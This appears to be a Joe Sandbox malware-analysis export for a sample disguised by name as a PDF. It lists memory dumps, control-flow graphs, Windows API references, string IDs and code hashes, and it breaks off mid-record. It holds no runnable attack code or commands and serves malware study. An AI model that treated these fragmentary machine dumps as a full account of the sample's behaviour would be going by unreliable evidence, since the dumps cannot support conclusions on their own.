                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$$^q
                                                                                                                                                                                • API String ID: 0-1593437937
                                                                                                                                                                                • Opcode ID: 4f3ffbce6fda62a219c444de0f271bbd4c2c6b165431b3c49feda70a43ecc1ed
                                                                                                                                                                                • Instruction ID: def83fb2e814f0733e457a34a6d8ed9fd0d758ac668a6263dfecd22a5e556a58
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f3ffbce6fda62a219c444de0f271bbd4c2c6b165431b3c49feda70a43ecc1ed
                                                                                                                                                                                • Instruction Fuzzy Hash: BE91A470B04229DBDB18ABB8C55427F7BB7BFD8700B04892DE456E7398CE35C9428B95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b9276b4bf946bd5a419b3d88644cfed9fa18e6ae1b2f2965f1e67e2718f2e4bc
                                                                                                                                                                                • Instruction ID: 97529a048eca63cc71636c428858d6b604e9b256bf4753219d30cb294c402b88
                                                                                                                                                                                • Opcode Fuzzy Hash: b9276b4bf946bd5a419b3d88644cfed9fa18e6ae1b2f2965f1e67e2718f2e4bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 4872AE74E05229CFDB64DF69C984BE9BBB2BB49300F1491E9D409A7351EB34AE81CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bf744f2d45169c4acfded69fa35f58a0df124246b9ed6bbf8506da4724053a37
                                                                                                                                                                                • Instruction ID: f213ee7eaa3b730919df5409f3d3fe696f68f4ae49e7950820fdf533e4747f42
                                                                                                                                                                                • Opcode Fuzzy Hash: bf744f2d45169c4acfded69fa35f58a0df124246b9ed6bbf8506da4724053a37
                                                                                                                                                                                • Instruction Fuzzy Hash: F7C18E74E01218CFDB14DFA5D994BADBBB2FB88301F1090A9D809A7364DB35AE85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5d2e18816d6c6358ca2202f6de240dc504231aea5e731cc4dffba64152b2f5fe
                                                                                                                                                                                • Instruction ID: d341697f80489a33c40d719aa784a9f53f48f5cb98048c73bb0344e74a2cd40f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d2e18816d6c6358ca2202f6de240dc504231aea5e731cc4dffba64152b2f5fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 94A11470E00208CFDB24DFA9D584B9DBBB1FF48304F249269E419AB2A1DB746985CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08d1dee7de54c8b4a405c7c9e7aad6d4a58f19cf7106570572f4b8ce8eb32083
                                                                                                                                                                                • Instruction ID: 51ec5b4259b17ca32cbaa63a7ac2658b7d930462eb1cd9e46449f19f8f931104
                                                                                                                                                                                • Opcode Fuzzy Hash: 08d1dee7de54c8b4a405c7c9e7aad6d4a58f19cf7106570572f4b8ce8eb32083
                                                                                                                                                                                • Instruction Fuzzy Hash: 7491F670E00618CFDB14DFA8D584BECBBB1FF49314F2492A9E419AB291DB74A985CF14
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce4d9731bd5bf0b74ae23b5c48f8d6e514519d87dd5fa4bdaf6af7bee5330d2c
                                                                                                                                                                                • Instruction ID: 563545fd696204bf6d88e4e4cdf3a29e07251fd9c4890caf75718a4f6a8dd116
                                                                                                                                                                                • Opcode Fuzzy Hash: ce4d9731bd5bf0b74ae23b5c48f8d6e514519d87dd5fa4bdaf6af7bee5330d2c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C51B574E00218DFDB18DFAAD594A9DBBF2FF88304F249029E819AB364DB319945CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 83969a01d8ac2b80be2ed1268397dea31f85fe7b8c6f79531d53056107e51d9c
                                                                                                                                                                                • Instruction ID: 63141e8bafcd7a9a90210d44ab3e0a5d99e5b9f943dd1a46d450e0603145cb57
                                                                                                                                                                                • Opcode Fuzzy Hash: 83969a01d8ac2b80be2ed1268397dea31f85fe7b8c6f79531d53056107e51d9c
                                                                                                                                                                                • Instruction Fuzzy Hash: F951A774E00218DFDB18DFAAD594A9DBBF2FF88304F149029E819AB364DB359945CF10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7616898-76168af 2 76168b1-76168c0 0->2 3 7616912-7616920 0->3 2->3 6 76168c2-76168ce call 7616444 2->6 7 7616933-7616935 3->7 8 7616922-761692d 3->8 13 76168d0-76168dc call 7616454 6->13 14 76168e2-76168fe 6->14 111 7616937 call 7611971 7->111 112 7616937 call 7616889 7->112 113 7616937 call 7616898 7->113 8->7 15 76169f0-7616a6a 8->15 12 761693d-761694c 19 7616964-7616967 12->19 20 761694e-761695f call 7616464 12->20 13->14 23 7616968-76169a5 13->23 28 7616904-7616908 14->28 29 76169ac-76169e9 14->29 42 7616a73-7616a7d 15->42 43 7616a6c-7616a72 15->43 20->19 23->29 28->3 29->15 47 7616a83-7616a9c call 761648c * 2 42->47 48 7616cb9-7616ce4 42->48 55 7616aa2-7616ac4 47->55 56 7616ceb-7616d78 47->56 48->56 63 7616ad5-7616ae4 55->63 64 7616ac6-7616ad4 call 7616464 55->64 81 7616d7a-7616d8d 56->81 82 7616d8f-7616db5 GetCurrentThreadId 56->82 70 7616ae6-7616b03 63->70 71 7616b09-7616b2a 63->71 70->71 79 7616b7a-7616ba2 71->79 80 7616b2c-7616b3d 71->80 114 7616ba5 call 7616f60 79->114 115 7616ba5 call 7616f50 79->115 89 7616b6c-7616b70 80->89 90 7616b3f-7616b57 call 761649c 80->90 87 7616dc5-7616dd2 81->87 85 7616db7-7616dbd 82->85 86 7616dbe 82->86 85->86 86->87 89->79 99 7616b59-7616b5a 90->99 100 7616b5c-7616b6a 90->100 95 7616ba8-7616bcd 102 7616c13 95->102 103 7616bcf-7616be4 95->103 99->100 100->89 100->90 102->48 103->102 106 7616be6-7616c09 103->106 106->102 110 7616c0b 106->110 110->102 111->12 112->12 113->12 114->95 115->95
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                                • API String ID: 0-1677660839
                                                                                                                                                                                • Opcode ID: 0447ca788b02796c6e16120b56c453b31790ca61a06f81370d1c3f98eb13af80
                                                                                                                                                                                • Instruction ID: 91fcb11b8122617cb6a11775613800183b549fb05be6ac1ab356ca60f266b90b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0447ca788b02796c6e16120b56c453b31790ca61a06f81370d1c3f98eb13af80
                                                                                                                                                                                • Instruction Fuzzy Hash: C1D1AFB4B002158FDB14EBB9C5545AEBBF6FF88310B2444A9D406AB390DF35ED42CBA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 116 1d276f1-1d27725 117 1d27b54-1d27b58 116->117 118 1d2772b-1d2774e 116->118 119 1d27b71-1d27b7f 117->119 120 1d27b5a-1d27b6e 117->120 127 1d27754-1d27761 118->127 128 1d277fc-1d27800 118->128 125 1d27bf0-1d27c05 119->125 126 1d27b81-1d27b96 119->126 136 1d27c07-1d27c0a 125->136 137 1d27c0c-1d27c19 125->137 138 1d27b98-1d27b9b 126->138 139 1d27b9d-1d27baa 126->139 142 1d27763-1d2776e 127->142 143 1d27770 127->143 129 1d27802-1d27810 128->129 130 1d27848-1d27851 128->130 129->130 150 1d27812-1d2782d 129->150 133 1d27c67 130->133 134 1d27857-1d27861 130->134 151 1d27c6c-1d27c9c 133->151 134->117 140 1d27867-1d27870 134->140 144 1d27c1b-1d27c56 136->144 137->144 145 1d27bac-1d27bed 138->145 139->145 148 1d27872-1d27877 140->148 149 1d2787f-1d2788b 140->149 152 1d27772-1d27774 142->152 143->152 192 1d27c5d-1d27c64 144->192 148->149 149->151 156 1d27891-1d27897 149->156 176 1d2783b 150->176 177 1d2782f-1d27839 150->177 169 1d27cb5-1d27cbc 151->169 170 1d27c9e-1d27cb4 151->170 152->128 153 1d2777a-1d277dc 152->153 204 1d277e2-1d277f9 153->204 205 1d277de 153->205 159 1d27b3e-1d27b42 156->159 160 1d2789d-1d278ad 156->160 159->133 163 1d27b48-1d27b4e 159->163 174 1d278c1-1d278c3 160->174 175 1d278af-1d278bf 160->175 163->117 163->140 178 1d278c6-1d278cc 174->178 175->178 179 1d2783d-1d2783f 176->179 177->179 178->159 186 1d278d2-1d278e1 178->186 179->130 187 1d27841 179->187 188 1d278e7 186->188 189 1d2798f-1d279ba call 1d27538 * 2 186->189 187->130 190 1d278ea-1d278fb 188->190 206 1d279c0-1d279c4 189->206 207 1d27aa4-1d27abe 189->207 190->151 195 1d27901-1d27913 190->195 195->151 197 1d27919-1d27931 195->197 260 1d27933 call 1d280d8 197->260 261 1d27933 call 1d280c9 197->261 200 1d27939-1d27949 200->159 203 1d2794f-1d27952 200->203 208 1d27954-1d2795a 203->208 209 1d2795c-1d2795f 203->209 204->128 205->204 206->159 211 1d279ca-1d279ce 206->211 207->117 229 1d27ac4-1d27ac8 207->229 208->209 212 1d27965-1d27968 208->212 209->133 209->212 214 1d279d0-1d279dd 211->214 215 1d279f6-1d279fc 211->215 216 1d27970-1d27973 212->216 217 1d2796a-1d2796e 212->217 232 1d279df-1d279ea 214->232 233 1d279ec 214->233 218 1d27a37-1d27a3d 215->218 219 1d279fe-1d27a02 215->219 216->133 220 1d27979-1d2797d 216->220 217->216 217->220 222 1d27a49-1d27a4f 218->222 223 1d27a3f-1d27a43 218->223 219->218 221 1d27a04-1d27a0d 219->221 220->133 226 1d27983-1d27989 220->226 227 1d27a0f-1d27a14 221->227 228 1d27a1c-1d27a32 221->228 230 1d27a51-1d27a55 222->230 231 1d27a5b-1d27a5d 222->231 223->192 223->222 226->189 226->190 227->228 228->159 234 1d27b04-1d27b08 229->234 235 1d27aca-1d27ad4 call 1d263e0 229->235 230->159 230->231 236 1d27a92-1d27a94 231->236 237 1d27a5f-1d27a68 231->237 238 1d279ee-1d279f0 232->238 233->238 234->192 241 1d27b0e-1d27b12 234->241 235->234 249 1d27ad6-1d27aeb 235->249 236->159 239 1d27a9a-1d27aa1 236->239 244 1d27a77-1d27a8d 237->244 245 1d27a6a-1d27a6f 237->245 238->159 238->215 241->192 246 1d27b18-1d27b25 241->246 244->159 245->244 251 1d27b27-1d27b32 246->251 252 1d27b34 246->252 249->234 257 1d27aed-1d27b02 249->257 254 1d27b36-1d27b38 251->254 252->254 254->159 254->192 257->117 257->234 260->200 261->200
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                • API String ID: 0-1932283790
                                                                                                                                                                                • Opcode ID: ba9fc2412144117f41972682d507f2c690f4af0e30cf2ebb9968ba670edd1617
                                                                                                                                                                                • Instruction ID: 7d2766a574b53cec5d9fa2224932fefd550733ab66df64543e8b6d227d8aa1c3
                                                                                                                                                                                • Opcode Fuzzy Hash: ba9fc2412144117f41972682d507f2c690f4af0e30cf2ebb9968ba670edd1617
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D124A30A002198FCB25CF69D984A9EBBF2FFA8318F148569E569DB361D730ED45CB50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 898 5b66904-5b671df GetCurrentProcess 904 5b671e1-5b671e7 898->904 905 5b671e8-5b6721c GetCurrentThread 898->905 904->905 906 5b67225-5b67259 GetCurrentProcess 905->906 907 5b6721e-5b67224 905->907 908 5b67262-5b6727d call 5b6732b 906->908 909 5b6725b-5b67261 906->909 907->906 913 5b67283-5b672b2 GetCurrentThreadId 908->913 909->908 914 5b672b4-5b672ba 913->914 915 5b672bb-5b6731d 913->915 914->915
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 05B671CE
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 05B6720B
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 05B67248
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 05B672A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: 80be8cbc0e6bea788f43d32c1849e1cc75e1593d25c86cbf01125e0ed5d060ac
                                                                                                                                                                                • Instruction ID: bdbd7c28038ed925d2090edea30d7d72999d39667c2c8c85ec4d9510543bcbdf
                                                                                                                                                                                • Opcode Fuzzy Hash: 80be8cbc0e6bea788f43d32c1849e1cc75e1593d25c86cbf01125e0ed5d060ac
                                                                                                                                                                                • Instruction Fuzzy Hash: C85146B09002098FDB14DFA9D548B9EBBF1FB48318F2484A9E419A7360DB34A984CF65

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 923 5b67148-5b671df GetCurrentProcess 928 5b671e1-5b671e7 923->928 929 5b671e8-5b6721c GetCurrentThread 923->929 928->929 930 5b67225-5b67259 GetCurrentProcess 929->930 931 5b6721e-5b67224 929->931 932 5b67262-5b6727d call 5b6732b 930->932 933 5b6725b-5b67261 930->933 931->930 937 5b67283-5b672b2 GetCurrentThreadId 932->937 933->932 938 5b672b4-5b672ba 937->938 939 5b672bb-5b6731d 937->939 938->939
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 05B671CE
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 05B6720B
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 05B67248
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 05B672A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: c765cace2abe66a6cd7f1fa43af96923f2d7d65b55ef8b1cb3a390c88fb3b1ec
                                                                                                                                                                                • Instruction ID: b403dc92045803aa9af94774972cd9fc2457f7bd94212029c861fb1c83967862
                                                                                                                                                                                • Opcode Fuzzy Hash: c765cace2abe66a6cd7f1fa43af96923f2d7d65b55ef8b1cb3a390c88fb3b1ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 475156B09002498FDB14CFA9D548B9EBBF1FB48318F2484A9E419A7360DB34A984CF65
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ActiveWindow
                                                                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                                                                • API String ID: 2558294473-4258043069
                                                                                                                                                                                • Opcode ID: 41fce7c70d69ff68e0beff8ed229f5a24db07fd66f5db77e94cfb12a35c34106
                                                                                                                                                                                • Instruction ID: 773196d5999e81ce18c4ce9c150dc4bdab745ffe2260ca39b94f94064c2535a1
                                                                                                                                                                                • Opcode Fuzzy Hash: 41fce7c70d69ff68e0beff8ed229f5a24db07fd66f5db77e94cfb12a35c34106
                                                                                                                                                                                • Instruction Fuzzy Hash: 79618E34F002559FDB18AFB4D4586AE7BE3FF94300F548868D40AEB390DE389992CB51
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $^q$$^q
                                                                                                                                                                                • API String ID: 0-355816377
                                                                                                                                                                                • Opcode ID: 6a3c8c58677ac39c964aefa1015888c96c84005002f4381f2b73fc76abd90cda
                                                                                                                                                                                • Instruction ID: e109872c99579104f1567c36f46a158cd19a33d62725263e196097a8d5615326
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3c8c58677ac39c964aefa1015888c96c84005002f4381f2b73fc76abd90cda
                                                                                                                                                                                • Instruction Fuzzy Hash: F3525574A00218CFEB159BA8C850B9EBBB7FF54300F1481A9C50AAB355DF359E85EF51
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFocus.USER32 ref: 08A50736
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 08A50787
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherFocusUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1077007772-0
                                                                                                                                                                                • Opcode ID: 93dbe80be530ceaf66719456ff09aeab1e9b0944423385c99563854f56d85d03
                                                                                                                                                                                • Instruction ID: 01aa60a09685151dc2d61208fcdccd91885ca540afd2c240b140da7739280c5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 93dbe80be530ceaf66719456ff09aeab1e9b0944423385c99563854f56d85d03
                                                                                                                                                                                • Instruction Fuzzy Hash: C2317A74A00A25CFDB10DF69C548BAEBBB5BF48B11F1444A8D805AB750DB34E880CFE0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFocus.USER32 ref: 08A50736
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 08A50787
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherFocusUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1077007772-0
                                                                                                                                                                                • Opcode ID: bd38d6f4bf584586a9902051bf5ceecf9904542ac7059ff6ebe76dba3aee03a6
                                                                                                                                                                                • Instruction ID: c7b21055311b21bc30f588847957fc9082c86b7a7df2ca2a0433946dea84d462
                                                                                                                                                                                • Opcode Fuzzy Hash: bd38d6f4bf584586a9902051bf5ceecf9904542ac7059ff6ebe76dba3aee03a6
                                                                                                                                                                                • Instruction Fuzzy Hash: C22168B9900A59DFDB108F69C5487EEBBB4FF18B20F1440A9E808A7751C734A984CFE1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Hbq$Hbq
                                                                                                                                                                                • API String ID: 0-4258043069
                                                                                                                                                                                • Opcode ID: eb9f40e5c2eaa7eb78549620d4a4dfa823e06a1486b365ac96785db0c95f3823
                                                                                                                                                                                • Instruction ID: cd4a6e7f1318ff4cc260e550c9d679f9232e4357a2a8b2ecc6772161af4d5a5c
                                                                                                                                                                                • Opcode Fuzzy Hash: eb9f40e5c2eaa7eb78549620d4a4dfa823e06a1486b365ac96785db0c95f3823
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C91D0307043658FDB169F38D854A6A7BF6BF98308F188569E8568B392CF39CC01D791
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ,bq$,bq
                                                                                                                                                                                • API String ID: 0-2699258169
                                                                                                                                                                                • Opcode ID: 436ba621d741991cc7c294c96e03955e21a486c950235d19c73dc0a096436f6d
                                                                                                                                                                                • Instruction ID: b298e322c83fb8456ef5fa674874c34587dc5c8d1cbcc1708e467763c5bb64cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 436ba621d741991cc7c294c96e03955e21a486c950235d19c73dc0a096436f6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D81B230A00625CFCB24DF6DC488A69BBF6FF99209F1485A9D925D7365DB31EC41CB60
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                • Opcode ID: 8ffb57583a9b5011cc373ae367c15b0b42b53603a6442a4279683b0e50808fa0
                                                                                                                                                                                • Instruction ID: 45443fa144821bc709b171af8d83658b15d20064881ec530dacc00f6e87d244d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ffb57583a9b5011cc373ae367c15b0b42b53603a6442a4279683b0e50808fa0
                                                                                                                                                                                • Instruction Fuzzy Hash: AD51B1307002259FDB09CF6DC854BAABBEAEF98318F148466E918CB355DB75CC02DB61
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Xbq$Xbq
                                                                                                                                                                                • API String ID: 0-1243427068
                                                                                                                                                                                • Opcode ID: 1e43443ad3f92c28e0ed37ca07830610334ff24022da9fbf37226e0c0b51ab9a
                                                                                                                                                                                • Instruction ID: c65d7cf72ac27e824720241837c9ce9b660046fdff6e8b7dd3300d372530ab4c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e43443ad3f92c28e0ed37ca07830610334ff24022da9fbf37226e0c0b51ab9a
                                                                                                                                                                                • Instruction Fuzzy Hash: B931E631704334A7DF1C466E859427EAAEABBDC308F14443AE926D3395DBBDCC458791
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR^q
                                                                                                                                                                                • API String ID: 0-2625958711
                                                                                                                                                                                • Opcode ID: 2e92ba201ad6450e2f3878d61a9ee8c3314751fa584f95e0c654e2f20fe365d2
                                                                                                                                                                                • Instruction ID: 176d4d462c42c040cf77cdafbcc4ade4e1d88a87a43414d11c36ee7c3daca705
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e92ba201ad6450e2f3878d61a9ee8c3314751fa584f95e0c654e2f20fe365d2
                                                                                                                                                                                • Instruction Fuzzy Hash: B052CC74E00219CFCB54DF68E994A9DBBB2FF48301F1095A9D809A7364EB746E85CF81
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR^q
                                                                                                                                                                                • API String ID: 0-2625958711
                                                                                                                                                                                • Opcode ID: 1f24f0cd53c1855ed6b40fe65ea12733927bf232cd7ac798f5bce6c5a5c4e986
                                                                                                                                                                                • Instruction ID: 45b8da8b26ee56c098b8612455dba4c172528469c2d5a86a317b8093ca5dfe69
